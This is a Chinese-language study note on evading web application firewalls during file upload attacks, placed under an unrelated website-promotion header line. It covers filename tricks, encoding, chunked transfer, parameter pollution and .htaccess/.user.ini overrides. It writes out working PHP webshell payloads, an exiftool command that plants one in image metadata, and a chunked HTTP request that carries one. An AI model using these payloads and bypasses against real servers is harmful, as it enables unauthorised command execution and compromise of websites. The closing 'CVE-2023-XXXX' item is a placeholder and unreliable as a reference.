上海阿里巴巴网站建设网站外贸推广

文件上传漏洞绕过WAF学习笔记

---

1. WAF检测原理

WAF（Web应用防火墙）通过以下方式拦截文件上传攻击：

1. 关键字匹配：检测文件名、内容中的敏感词（如<?php、eval）。

2. 扩展名黑名单：拦截.php、.jsp等危险扩展名。

3. 文件头验证：检查文件魔数（如FFD8FF对应JPEG）。

4. 流量特征分析：检测异常请求结构（如超长文件名、畸形HTTP包）。

---

2. 通用绕过技术

2.1 解析差异利用

• 大小写混合：sHell.PhP、.Php（部分WAF未统一大小写）。

• 特殊字符插入：

  • 分号截断（IIS）：shell.asp;.jpg → 解析为.asp。

  • 换行符插入：filename="shell.p\nhp"（绕过正则匹配）。

• 扩展名混淆：

  • 多重扩展名：shell.php.jpg → 结合解析漏洞（如Apache解析最后有效扩展名）。

  • 非标准扩展名：.php7、.phtml、.phar（需环境支持）。

---

2.2 编码混淆

• URL编码：

  • shell.%70hp（%70=p）→ 部分WAF不解码检测。

• Unicode编码：

  • shell.\u0070hp → 转换为shell.php。

• HTML实体编码：

  • 文件名：shell.#112;hp（#112;=p）。

• Base64/Hex编码文件内容：

  php

  <?= eval(base64_decode("c3lzdGVtKCRfR0VUWydjbWQnXSk7")); ?>  

---

2.3 分块传输（Chunked Encoding）

• 绕过原理：WAF可能不解析分块传输的文件内容。

• 示例：

  http

  POST /upload HTTP/1.1  
  Transfer-Encoding: chunked  
  ​
  7\r\n  
  <?php \r\n  
  8\r\n  
  system($_GET['cmd']);\r\n  
  0\r\n  

• 工具：Burp Suite的Chunked Coding Converter插件。

---

2.4 文件内容绕过

• 图片马注入：

  • 在图片元数据中插入代码（Exif注释、IPTC字段）。

  bash

  exiftool -Comment='<?php system($_GET["cmd"]); ?>' image.jpg  

• 短标签与动态调用：

  php

  <?= `$_GET[0]`?>  # 短标签  
  <?php $_GET['a']($_GET['b']); ?>  # 动态函数调用  

• 代码碎片化：

  php

  <?php $a = "syste"; $b = "m"; $a.$b("id"); ?>  

---

2.5 HTTP协议特性利用

• 参数污染：

  http

  POST /upload?filename=shell.jpg HTTP/1.1  
  Content-Disposition: form-data; name="file"; filename="shell.php"  

  • 部分WAF优先取URL参数中的文件名。

• 多文件上传绕过：

  • 在多个文件字段中插入恶意文件，WAF可能只检测第一个。

---

3. 针对特定WAF的绕过

3.1 云WAF（如Cloudflare、阿里云）

• 缓存污染攻击：

  • 上传合法文件触发缓存，再覆盖为恶意文件。

• IP轮询绕过：

  • 通过大量不同IP上传，绕过频率限制。

3.2 ModSecurity规则绕过

• 已知规则缺陷：

  • 使用非常规扩展名：.php%20（空格）、.php.（末尾点）。

  • 利用正则回溯限制：构造超长文件名耗尽WAF计算资源。

---

4. 高级技巧

4.1 .htaccess/.user.ini覆盖

• .htaccess（Apache）：

  复制

  AddType application/x-httpd-php .jpg  

• .user.ini（PHP）：

  复制

  auto_prepend_file=shell.jpg  

4.2 分片上传绕过

• 上传文件分片后合并，绕过WAF对完整文件的检测。

4.3 0day漏洞利用

• CVE-2023-XXXX：特定WAF未修复的解析漏洞（需持续跟踪）。